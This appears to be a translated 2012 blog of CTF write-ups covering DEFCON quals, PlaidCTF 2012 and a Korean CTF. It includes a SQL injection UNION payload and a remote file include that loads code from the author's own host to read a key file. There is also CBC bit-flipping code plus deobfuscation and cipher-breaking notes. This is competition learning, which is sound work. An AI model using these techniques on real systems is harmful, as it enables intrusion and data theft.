Tuesday, 21 August 2012

ICX1 behind the scenes: R4





I'm sure you can all guess what comes next. Not posting much more of it.

Monday, 20 August 2012

ICX1 behind the scenes: S5

The hardest (and most annoying) one so far.


The setup: Nobody types some text into the text box, and the "Encrypted Traffic" in the middle gets eavesdropped by No one.
You (No one) have to break the pile of encrypted traffic and work out what Nobody typed.

*This one uses RSA + ISO-standard session key exchange + RC4.
Looks pretty secure (?)


Progress so far:

Green = solved (meaning the level exists.)

No idea when I'll get it finished. And once it's done nobody will play it (or nobody will know how to play it). No idea why I'm building it at all.

Monday, 4 June 2012

DEFCBA xx post-mortem

Have to play, and have to complain
This time I really have to complain
=====================

You ask me to write a urine100 write-up and I think: how the hell am I supposed to write that?
Same as asking me how I got past the Four Door Gods.

AoR level 76 write-up:
First thing you see is a picture
with four things in it.
The URL says something like exifforhints, so just grab a hex editor or whatever and open the JPG file.
Inside it says Lord of the Rings.
Then look at the four things again: what the hell do they have to do with it?

Randomly crop the picture and search Google. Found a bird.
No idea what it means.

Only thing left is to cheat.
Four things, so the answer should be four letters.
Grab a dictionary word list and brute force it.
After a while of hammering, gate turned out to be the answer. Don't ask me why.


urine100 write-up:
First thing you see is the question How many developers;) did it take to secure Windows 8?
No hints. Damn.

Random Google search, found Building Windows 8 - Site Home - MSDN Blogs.
Page three has an Introducing the team post,
which says "We have about 35 feature teams in the Windows 8 organization.  Each feature team has anywhere from 25-40 developers, plus test and program management, all working together."

There's a team called Reliability, Security, and Privacy.
So it should be 25-40. I tried 25 through 40 one by one; all wrong.
Oh, there's also a Security & Identity team; tried 50 - 80 as well (don't ask me how I worked that out); all wrong again.

Damn, have to cheat again.
It asks how many, so the answer should be a non-negative integer.
Wrote a loop from 0 to 10000 and brute forced it; I figured the team wouldn't exceed ten thousand people, the post says the whole org is a thousand-odd.
Then, as anyone with eyes could see, the answer was 152. Don't ask me why.


Exercise: without using a search engine, answer 埃屍 S1 (hint: the answer is a year, so it should be a number)
=====================

gameboy400 asks What is Jeff Moss' checking account balance?
You get a site dressed up as a bank.
There's a branch-finder form that is open to SQL injection.
Type something like 0 UNION SELECT '1','2','3','4',5,'6' FROM somewhere
(I think the full statement is SELECT * FROM "branch" WHERE zip = /* Your Input */)

So look for anyone with the last name Moss.
There's a Trinity Moss. What the hell, is that his wife?
Go into her account: checking and savings are both empty.
Answer 0, it says wrong.
Look for anyone called Jeff: nobody.
Fine, look for any account with money: add Balance > 0 to the WHERE.
Not a single record. Not one.
What the hell kind of bank is this, ON NINE NINE; shut it down already.

Then I saw the guy next to me type 0.0 and get WRONG.
I remembered the balance on the user page isn't shown as 0.0.
Went back and looked: the balance is 0.00.
Typed 0.00: CORRECT.
Ridiculous. That's worth 400 points?
Damn, I typed 0 earlier and it said WRONG.
WRONG my ass.


A similarly stupid question was in the AoR whatever invitational, no idea which round,
the last question, Notepad.Txt or something.
Online Ribble normally has you answer everything in lowercase; this time you really had to answer Txt or whatever; answering txt was marked wrong.
Wrong my ass.

No exercise this time. 埃屍 shouldn't have this kind of stupid question (I think).
If it does, let me know.
=====================

Last, the pointless gameboy100 question.
The question is Hack the planet_

I typed Hack the planet! and it popped up WRONG.
I typed ! again and the WRONG was still there.
Then I tried ? and . and Hack the planet? and Hack the planet. and those were wrong too.
After messing around for who knows how long I typed ! once more and it said CORRECT.
Damn, what the hell was that. I suspect I answered too fast and it didn't show me the SLOW DOWN, so I thought it was wrong.

Exercise: what, this one has an exercise too?
=====================

Waiting for people to post the other answers. That urine200 was truly awful, dumb as a dog.
It said Break the cipher, so I thought it was a crypto challenge and was quite pleased.
Go in and it's a junk website, some al-Qaeda official site, a pile of crappy JSON libraries copied from elsewhere.
The gallery.php wouldn't open; fastbutton.html had a Hugo in it; tried that, wrong. Wrong my ass.

Wrong my ass wrong my ass wrong my ass

Friday, 4 May 2012

3P2012CTF

Here we go again: play, then complain.
This time the thing was dressed up as an RPG.
In the end they had to give in and provide a simple interface anyway.


Did a bit better this time, got four questions. They had quite a lot of questions this time, though.

Question 1
Addition is Hard
15
Puzzles
Addition is hard!
0x0 +0x7068703f = ?
Answer in decimal

One look and you know it's a rehash of the 2011 trivia questions. Last year's "past paper": http://www.plaidctf.com/pctf2011/site_media/writeups/pCTF2011_Writeup_HFS.txt
Damn, it's clearly not meant for humans to read.
Ask Google for 1.3337 ~= XXXXXXX/3145727 and you get the Pentium FDIV bug.
This time it has to be an addition bug, so I asked Google; nothing. (There is now, of course.)

As anyone with eyes can see, 7068703f is php? (I think)
So Google php hex addition bug and this page comes up
https://bugs.php.net/bug.php?id=61095

Turns out a plus sign stuck to the number doubles it. Bonkers.
Answer: 3771785342


Question 2

RoboDate
100
Password Guessing
So apparently robots, despite their lack of hormones, still have an underlying desire to mate. We stumbled upon a robot dating site, RoboDate. Hack it for us!

This pointless dating site lets you enter a name and a relationship status (the form is hidden too, so you have to open Firebug).
Submit it and it echoes your name and status back at you. Pointless, right?
If you look at the source you'll see a hilarious debug message



Spelled out that plainly. The query string carries a long hex string; casually change one byte of it and the content of user_data changes. Right, Padding Oracle rehashed again. Rehashed last year and still Padding Oracle in mid-2012.
Strictly speaking this isn't a Padding Oracle, because you never need to touch the padding bytes; change those and it just says Go away. And the oracle doesn't tell you whether it will rain tomorrow; it tells you the first number in tomorrow's Mark Six draw, and if you change the second byte it tells you the second number. You get to do whatever you want. Even without knowing the IV XOR M' = M formula you can just keep fiddling until you've built up |admin.

Answer: 2012-04-25_14:46:24.29582+05:27@2012%127.0.0.2_IS_BEST_KEY
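The byte fiddling described above is CBC bit-flipping against a decryption oracle. Here is an added example of it (my code, not the challenge's or the post's): a toy server built on a constructed Feistel block cipher with PKCS#7 padding, a debug page that echoes the decrypted user_data or answers "Go away." when the padding check fails, and an attacker that rewrites the IV so the first block decrypts to |admin without knowing the key. The cipher, the token layout (IV followed by ciphertext, hex-encoded) and the user_data contents are assumptions; the real RoboDate cipher is not on the page.

```python
import hashlib
import os

BLOCK = 8  # block size in bytes of the constructed toy cipher

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(half: bytes, key: bytes, i: int) -> bytes:
    # Keyed round function of the toy Feistel cipher (stand-in for a real block cipher).
    return hashlib.sha256(key + bytes([i]) + half).digest()[:4]

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    l, r = blk[:4], blk[4:]
    for i in range(8):
        l, r = r, _xor(l, _round_fn(r, key, i))
    return r + l

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    r, l = blk[:4], blk[4:]
    for i in reversed(range(8)):
        l, r = _xor(r, _round_fn(l, key, i)), l
    return l + r

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n == 0 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return out

# --- server side (assumed: the attacker never learns SERVER_KEY) ---
SERVER_KEY = hashlib.sha256(b"constructed demo key").digest()[:16]

def make_token(user_data: bytes) -> str:
    iv = os.urandom(BLOCK)
    return (iv + cbc_encrypt(SERVER_KEY, iv, pad(user_data))).hex()

def debug_page(token_hex: str) -> str:
    # The "debug message": echoes the decrypted user_data, or "Go away." when
    # the padding check fails. Echoing the plaintext is what makes this trivial.
    raw = bytes.fromhex(token_hex)
    try:
        return unpad(cbc_decrypt(SERVER_KEY, raw[:BLOCK], raw[BLOCK:])).decode("latin-1")
    except ValueError:
        return "Go away."

# --- attacker side: no key needed ---
def flip_first_block(token_hex: str, known: bytes, wanted: bytes) -> str:
    # In CBC, P1 = D(C1) XOR IV, so IV' = IV XOR P1 XOR P1' makes block 1
    # decrypt to P1'. `known` is the plaintext at the start of block 1.
    if len(known) != len(wanted) or len(known) > BLOCK:
        raise ValueError("known and wanted must be equal length and fit in block 1")
    raw = bytes.fromhex(token_hex)
    delta = _xor(known, wanted) + b"\x00" * (BLOCK - len(known))
    return (_xor(raw[:BLOCK], delta) + raw[BLOCK:]).hex()

def tamper_padding(token_hex: str) -> str:
    # Flip one bit in the block before the last one: the last plaintext byte
    # changes by that bit, the padding check fails and the oracle says "Go away."
    raw = bytearray.fromhex(token_hex)
    raw[len(raw) - BLOCK - 1] ^= 0x01
    return raw.hex()
```

The attack needs nothing from the padding: it only needs the oracle to echo the plaintext and the attacker to know what the first block says, which the debug message hands over. Encrypt-then-MAC over IV and ciphertext, or any authenticated mode, would stop both the flip and the "Go away." leak.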



Question 3

Paste
100
Practical Packets
Robot hackers, like their human counter parts, have a largely unmet need to dump large amounts of text to their peers. We recently got access to one of their servers and are providing you with the files. What have they been talking about?

This time they give you the source code. It's PHP. The README says PLEASE TURN allow_url_include ON. Turning on something that dangerous, this must be where it breaks. Digging around, display_paste.php has a bit where, if the first two characters are ^^, it does require(substr($description, 2). ".txt"); . Then make_followup.php says you need an admin cookie before you can post a description starting with ^^. Somehow I could post ^^ without any admin cookie. So I happily posted the monster ^^. Typing this paragraph I've got a pile of ^^ myself. Set the description to some file on my own site and I can change and run code as I please. First thought: dig through the mysql database. Turns out there's nothing (well, a pile of other contestants' posts). Example:


Array
(
    [0] => 4f9d6643584e0
    [id] => 4f9d6643584e0
    [1] => test
    [text] => test
    [2] => abap
    [language] => abap
    [3] => 4f9d6378af542
    [parent] => 4f9d6378af542
    [4] => ^^http://debugducky.com/test
    [description] => ^^http://debugducky.com/test
)

Look, I even got this thing up there:
http://debugducky.com/test.txt



You can see them digging through information_schema.
Seeing nothing, use dir. Turns out there's something called key.php. Damn.
fread it and there's the answer.


Answer: s0m3_php_d3v5_actua11y_d0_th15




Question 4

3D
100
Potpourri
The robots appear to be testing some kind of new camera technology but we haven't quite figured it out yet. Understanding this imaging could be crucial to our understanding the enemy and winning the war.

Mr. Luk (actually I don't think his surname is Luk. Not talking about you, 歐花) also had a hand in this one, I think.
You get a giant JPG file. Some kind of holographic photography. But it's only one image, and something is covering the answer.
Actually you just need to explode it on the JPG header and footer (FF D8, FF D9) and it bursts into lots of images.
Mr. Luk said he split it by hand (?) and the last image showed the answer, I think.
The images are actually pretty blurry. You need to look at several before you can read the answer.

Answer: 3d_g1v35_m3_a_h3adach3
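The header/footer explode described above, as an added example (my code, not the tool used in the write-up): a carver that slices every FF D8 ... FF D9 span out of a blob, plus a minimal marker walker that reads each slice's dimensions from its SOF header, so you can tell which of the carved frames are worth opening. The sample blob is constructed from three synthetic frames that carry the marker skeleton but no real image data; the challenge file itself is not on the page.

```python
import sys

SOI = b"\xff\xd8"  # start of image
EOI = b"\xff\xd9"  # end of image

def carve_jpegs(blob: bytes) -> list:
    """Slice out every SOI..EOI span in order of appearance.

    Naive by design (that is what "explode on header and footer" means): a
    frame that embeds another JPEG, e.g. an EXIF thumbnail, is cut at the
    inner EOI, so check the sizes of what comes out.
    """
    found, pos = [], 0
    while True:
        start = blob.find(SOI, pos)
        if start < 0:
            break
        end = blob.find(EOI, start + len(SOI))
        if end < 0:
            break
        found.append(blob[start:end + len(EOI)])
        pos = end + len(EOI)
    return found

def jpeg_size(data: bytes):
    """Walk the marker segments up to the first SOFn and return (width, height)."""
    i = len(SOI)
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            raise ValueError("expected a marker at offset %d" % i)
        marker = data[i + 1]
        if marker == 0xFF:                  # fill byte before a marker
            i += 1
            continue
        if marker in (0x01, 0xD8, 0xD9) or 0xD0 <= marker <= 0xD7:
            i += 2                          # stand-alone markers carry no length
            continue
        if marker == 0xDA:                  # SOS: entropy-coded data follows, no SOF seen
            break
        seglen = int.from_bytes(data[i + 2:i + 4], "big")
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):
            # SOFn payload: precision(1) height(2) width(2) ...
            height = int.from_bytes(data[i + 5:i + 7], "big")
            width = int.from_bytes(data[i + 7:i + 9], "big")
            return width, height
        i += 2 + seglen
    raise ValueError("no SOF marker found")

def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

def fake_jpeg(width: int, height: int) -> bytes:
    """Constructed stand-in frame: SOI, APP0, SOF0 with the given size, EOI.
    Not decodable; it only has the marker structure the functions above read."""
    sof0 = bytes([8]) + height.to_bytes(2, "big") + width.to_bytes(2, "big") + b"\x01\x01\x11\x00"
    return SOI + _segment(0xE0, b"JFIF\x00") + _segment(0xC0, sof0) + EOI

def build_sample_blob() -> bytes:
    # Constructed input: three frames glued together with junk bytes in between.
    return b"junk" + fake_jpeg(640, 480) + b"\x00" * 5 + fake_jpeg(16, 9) + fake_jpeg(2000, 1000) + b"tail"

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    for n, img in enumerate(carve_jpegs(blob)):
        name = "carved_%03d.jpg" % n
        with open(name, "wb") as f:
            f.write(img)
        print(name, len(img), "bytes", jpeg_size(img))
```

Run it with the challenge file as the argument and it writes carved_000.jpg, carved_001.jpg, ... next to it, printing the size of each; without an argument it runs on the constructed sample.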



There's one weird question I couldn't get, even though it looked easy (it was worth 150, mind you).
Looking at other people's answers, it needed XOR. Damn, XOR again.

Won't write up the rest. After a certain point every question turns into reverse engineering. Like playing 埃屍, where every question turns into programming after a while.


Finally, the gag question

Shoulder Surfing
25
Puzzles
What's a password that polaroid head got from inside Ellingson?
Answer

http://www.youtube.com/watch?v=eIAQFJhuNmU&t=4m44s

Obvious to anyone with eyes. Let's see how many times you have to watch it.

Friday, 13 April 2012

Black as can be

Good Friday turned into Black Friday
After the peak comes the fall

Sunday, 26 February 2012

曲基 2012 CTF post-mortem

Played the whole day and ground out two questions.

Question one, M1: obvious to anyone with eyes, it's a substitution cipher (I think)
Ever since last year's DEFCON 19 CTF, when I saw in someone's write-up that there's a tool called Decrypto,
Purplehell's crappy Cryptogram Solver has been gathering dust.

Question:
Az hrb eix mcc gyam mcxgixec rokaxioaqh hrb mrqpck gyam lbamgarx oatygqh Erxtoigbqigarx Gidc hrbg gasc gr koaxd erzzcc zro i jyaqc Kr hrb ocqh rx Ockubqq ro Yrg man?
Gyc ixmjco am dccqihrbgm
Throw the sentence into Decrypto and it solves it in one go (I think)

Solution:
If you can see this sentance ordinarily you solved this ~uistion rightly Congratulation Take yout time to drink coffee for a while Do you rely on Red~ull or Hot si~? The answer is keelayouts

The tilde marks an "unknown character"; I guess it's q.
Answer: keelayouts


Another question, M4, gives you a zip backup of a website, with a strange piece of javascript in a js file:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12 7=["\\10\\8\\26\\21\\16\\25\\8","","\\21\\8\\20\\14\\22\\24","\\23\\27\\30\\23\\22\\10\\29\\20\\14","\\31\\10\\17\\28\\18\\24\\16\\10\\18\\17\\35\\8"];32 37(5){5=5[7[0]](/ /15,1);5=5[7[0]](/\\38/15,0);12 13=5;5=7[1];19(6=0;6<13[7[2]];6++){5=13[7[3]](6,6+1)+5};12 11=7[1];19(6=0;6<5[7[2]];6+=9){11+=36[7[4]](33(5[7[3]](6,6+9),2))};34(11)};',10,39,'|||||_0x272dx2|i|_0xfd3a|x65||x72|_0x272dx4|var|_0x272dx3|x67|g|x61|x6F|x43|for|x6E|x6C|x74|x73|x68|x63|x70|x75|x6D|x69|x62|x66|function|parseInt|eval|x64|String|c|t'.split('|'),0,{}))

eval p,a,c,k,e,d again.
Earlier I found a pretty good way of unpacking the eval: replace eval with a wrapper that prints its argument before running it.

var oldEval = eval;          // keep the native eval
eval = function (a) {        // assigned as an expression: a hoisted function declaration would shadow eval before oldEval is saved
    document.write(a + '<hr />');
    return oldEval(a);
};

Unpacking it once gives:
var _0xfd3a=["\x72\x65\x70\x6C\x61\x63\x65","","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];function c(_0x272dx2){_0x272dx2=_0x272dx2[_0xfd3a[0]](/ /g,1);_0x272dx2=_0x272dx2[_0xfd3a[0]](/\t/g,0);var _0x272dx3=_0x272dx2;_0x272dx2=_0xfd3a[1];for(i=0;i<_0x272dx3[_0xfd3a[2]];i++){_0x272dx2=_0x272dx3[_0xfd3a[3]](i,i+1)+_0x272dx2};var _0x272dx4=_0xfd3a[1];for(i=0;i<_0x272dx2[_0xfd3a[2]];i+=9){_0x272dx4+=String[_0xfd3a[4]](parseInt(_0x272dx2[_0xfd3a[3]](i,i+9),2))};eval(_0x272dx4)};

There's another eval in there, so try unpacking again: nothing comes out. So that eval isn't being called; most likely it's inside the function.
So I tried listing the global properties:

for (var i in window) {
    document.write('Property = ' + i + '<br />Value = ' + window[i] + '<hr />');
}

(You can tell from my using a above and i below that both snippets were copied from who knows where.)
Result:
Property = _0xfd3a
Value = replace,,length,substring,fromCharCode
Property = c
Value = function c(_0x272dx2){_0x272dx2=_0x272dx2[_0xfd3a[0]](/ /g,1);_0x272dx2=_0x272dx2[_0xfd3a[0]](/\t/g,0);var _0x272dx3=_0x272dx2;_0x272dx2=_0xfd3a[1];for(i=0;i<_0x272dx3[_0xfd3a[2]];i++){_0x272dx2=_0x272dx3[_0xfd3a[3]](i,i+1)+_0x272dx2};var _0x272dx4=_0xfd3a[1];for(i=0;i<_0x272dx2[_0xfd3a[2]];i+=9){_0x272dx4+=String[_0xfd3a[4]](parseInt(_0x272dx2[_0xfd3a[3]](i,i+9),2))};eval(_0x272dx4)}

So there's a function c. If you tidy it up you'll see it takes _0x272dx2, does replace(/ /g,1) and replace(/\t/g,0), then some substring business. My guess is that the input to c is a pile of spaces and tabs, like that 埃屍 R29 question that drove everyone up the wall.
Then I was thinking about how to brute force the input parameter; later a friend found a place on the site where the function c is called. I copied that bit, and the input parameter really is a pile of spaces and tabs. Whoever built this really had too much time.

That bit (I bet the blog eats all my spaces and tabs):
c(' ');

Then I put this together with the piece unpacked earlier and ran it through the eval unpacker once more:
if(new Date().getTime()>1330268400000){ var dummya = '1'; var dummyb = '1'; var dummyv = '1'; var dummyc = '1'; var dummys = '1'; var dummyae = '1'; var dummyasefa = '1'; var dummeya = '1'; var dummya = '1'; var dum3mya = '1'; var dumm54ya = '1'; var dumm3ya = '1'; var dum1mya = '1'; var p = 'YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT'; p = p.replace(/T/g,'').replace(/P/g,'').replace(/Y/g,'').replace(/K/g,'%'); var authkey = unescape(p); }


var authkey = unescape(p), there it is.
Plus a pointless if that checks whether your computer's clock is past the contest deadline.
Just delete the if, then alert or document.write the authkey, and you get:
AHH4mRsK4NGF0r3v3r
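To see what c() does to its whitespace argument without letting the eval run, here is an added re-implementation (mine, not the challenge's code): a decoder that follows the same steps as c (space to 1, tab to 0, reverse the bit string, read 9-bit groups), an encoder so you can build test inputs since the real one was eaten by the blog, and the final p-string clean-up that yields the authkey with the date check left out. The p string is copied from the unpacked script above; the sample payload is constructed.

```python
from urllib.parse import unquote

def whitespace_decode(payload: str) -> str:
    """Mirror of the obfuscated c(): ' ' -> '1', '\\t' -> '0', reverse the bit
    string, then read it in 9-bit groups as character codes (the eval is skipped)."""
    if set(payload) - {" ", "\t"}:
        raise ValueError("payload may contain only spaces and tabs")
    bits = payload.replace(" ", "1").replace("\t", "0")[::-1]
    return "".join(chr(int(bits[i:i + 9], 2)) for i in range(0, len(bits), 9))

def whitespace_encode(text: str) -> str:
    """Inverse of whitespace_decode, used to build inputs for c()."""
    if any(ord(ch) > 0x1FF for ch in text):
        raise ValueError("9-bit codes only")
    bits = "".join(format(ord(ch), "09b") for ch in text)
    return bits[::-1].replace("1", " ").replace("0", "\t")

def extract_authkey(p: str) -> str:
    """Last stage of the unpacked script: strip the T/P/Y noise, turn K into
    %, and URL-decode. The Date() check that gates it is simply not applied."""
    cleaned = p.replace("T", "").replace("P", "").replace("Y", "").replace("K", "%")
    return unquote(cleaned)

# The p string exactly as it appears in the unpacked script above.
P_FROM_PAGE = ("YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30"
               "TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT")

# Constructed sample: a script and the whitespace blob the hidden call site would pass to c().
SAMPLE_SCRIPT = "var authkey = 'demo';"
SAMPLE_PAYLOAD = whitespace_encode(SAMPLE_SCRIPT)
```

Decoding this way, rather than pasting the call into a browser, means the second-stage script is read as text instead of executed, which is the safe default for anything that ends in eval.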

This question was somehow worth 300 points. The 100-point ones (apart from M1) were insanely hard, but if you can't answer a 100 they won't let you attempt the "harder (I think)" questions. Really exasperating.



Got up this morning and saw someone had solved M5. I downloaded all the questions and had a go.
Let's view the problem from another angle.
Decrypt it.
RDCVGF_YGBNJU_TGBNM_YGBNJU_TGBNM_TGBNM_YGBNJU_TGBNM

So much repetition. Threw it into the substitution cipher program: 0 results found. So they aren't English words.
Then I thought back to the pointless Ribble question types. One of them is drawing a letter with the keys. Drawing it actually produced something:
GOLOLLOL
Answered it, told wrong.
Thought about the other pointless Ribble types. One of them is the upside-down calculator. The G looked like a 6, so tried it upside down: 70770709
Wrong again.

Couldn't be bothered to try anything in the remaining 2 minutes; waited for the write-ups.
Later asked around: it's actually G_O_L_O_L_L_O_L.
Truly ck, ck, ck. (* not profanity)



The thing Online Ribble must avoid above all is bad questions. Let's look back at the classic Four Door Gods bad question:

Back then you had to brute force the answer. Think for yourself why it's called the Four Door Gods; it's related to the answer.

This 曲基 also seemed to have some that need brute force, like M2 and M3. You wouldn't finish hammering before next year's Buddha's Birthday.

M2:
Alice wants to send a message to Bob in secure way.
Alice encrypted a plaintext PA = "IMISSYOU" = 0x494D495353594F55 by using DES and obtained ciphertext CA = 0xFA26ED1833264435.
Alice sent the ciphertext CA and the secret key to Bob. The secret key was encrypted by converting each of its letters to a pair of digits giving its position in the typewriter keyboard. More precisely, the following table is used.

1 2 3 4 5 6 7 8 9 0
1 Q W E R T Y U I O P
2 A S D F G H J K L
3 Z X C V B N M

In this manner, 'A' is converted to 21, 'B' to 35, etc. In transmission, all of the first digits were lost and the received secret key resulted in the pairs:
?8 ?9 ?9 ?4 ?3 ?5 ?9 ?5

After a few minutes, Bob recovered the secret key and smiled. Bob decided to reply in the same way.
Bob encrypts a plaintext PB = 0xB6B2B6ACACA6B0AA by using DES and obtained ciphertext CB = 0x05D912E7CCD9BBCA.
What is the secret key which Bob used? (0x????????????????) (Bob's secret key is different from Alice's secret key)

Answer: strupr(????????????????)

Solved it after a while: the key is ILOVEBOB, and I verified it.
Then the question says "Bob decided to reply in the same way", i.e. he sends the ciphertext and the encrypted key back to Alice.
So the key domain is 8 uppercase letters, 26^8 to brute force. OMG.
After my research I discovered DES uses a 56-bit key (a huge secret, I know); give it a 64-bit key and it trims it, so the key BBBBBBBB is the same as CCCCCCCC. Conclusion: there are 14 groups of letters:
A, B=C, D=E, F=G, ... V=W, X=Y, Z
Still 14^8 to brute force. Wonderful. Can't do it without a supercomputer / server farm; am I supposed to buy cloud?
Hammering like that wouldn't finish by dawn, and by dawn the contest is over. So I just threw dictionary words at it, guessing Bob would send back something like ILOVEYOU. Of course it didn't hit.

Reading the write-ups: P_A XOR P_B = 0xFF, C_A XOR C_B = 0xFF, so K_A XOR K_B = 0xFF.
Made me swear out loud. It says he sends the encrypted key back, so the question is just set wrong.
If Mr. V had spotted that P_A and P_B have the same pattern it would have been fine. We thought P_B was emoticons, or Korean.
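Two things in the M2 discussion above can be checked without running DES at all: that ignoring the parity bit really collapses the 26 letters into the 14 groups listed, and that the complementation property (E(~K, ~P) = ~E(K, P)) turns the quoted constants into a one-line answer. This is an added example (my code, not from the post); it uses only the values quoted in the question, plus ILOVEBOB as recovered above. The hex string it derives for Bob's key is my own derivation; the page does not state which form the checker accepted, and any key in the same parity class would encrypt identically.

```python
import string

# Constants quoted in the M2 question text
PA = 0x494D495353594F55
CA = 0xFA26ED1833264435
PB = 0xB6B2B6ACACA6B0AA
CB = 0x05D912E7CCD9BBCA
KA = int.from_bytes(b"ILOVEBOB", "big")  # Alice's key, recovered in the write-up
MASK64 = (1 << 64) - 1

def effective_key(key: bytes) -> bytes:
    """DES reads only 56 bits: the low (parity) bit of each key byte is ignored,
    so keys differing only in those bits are the same key."""
    return bytes(b & 0xFE for b in key)

def letter_classes() -> list:
    """Group A..Z by effective key byte: the 14 groups from the write-up."""
    groups = {}
    for ch in string.ascii_uppercase:
        groups.setdefault(effective_key(ch.encode()), []).append(ch)
    return list(groups.values())

def dedupe_candidates(words) -> list:
    """Drop brute-force candidates that collapse to a key already tried."""
    seen, keep = set(), []
    for w in words:
        k = effective_key(w.encode())
        if k not in seen:
            seen.add(k)
            keep.append(w)
    return keep

def is_complement_pair(x: int, y: int) -> bool:
    return (x ^ y) == MASK64

def bob_key_by_complementation() -> str:
    """DES complementation: E(~K, ~P) = ~E(K, P). With PB = ~PA and CB = ~CA,
    KB = ~KA maps PB to CB (as does any key in KB's parity class)."""
    if not (is_complement_pair(PA, PB) and is_complement_pair(CA, CB)):
        raise ValueError("not a complement pair: the shortcut does not apply")
    return "%016X" % (KA ^ MASK64)

def brute_force_cost(length: int = 8) -> tuple:
    """Keyspace before and after collapsing letters into parity classes."""
    return 26 ** length, len(letter_classes()) ** length
```

The complement check is worth running before any brute force: the moment both XORs come out as all ones the search is over, and even when they do not, dedupe_candidates removes the wasted parity-twin trials from a dictionary run.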

Anyway, having something to play is better than nothing. I understand that setting questions is hard.
So this kind of thing happens all the time: http://ozetta.net/aor/pon.html
Mr. A: will have.

- End -


Exercise: use the eval unpack trick on a[6] from 埃屍 R35. Guaranteed to make you swear.